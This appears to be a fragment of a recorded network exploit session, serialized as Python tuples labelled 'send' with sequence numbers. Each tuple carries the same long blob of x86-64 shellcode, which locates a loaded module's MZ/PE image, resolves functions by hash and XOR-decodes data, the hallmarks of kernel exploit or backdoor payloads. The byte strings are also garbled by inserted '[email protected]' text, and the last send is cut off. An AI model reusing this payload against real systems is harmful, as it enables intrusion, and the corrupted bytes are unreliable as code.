\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 13, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 14, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 15, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 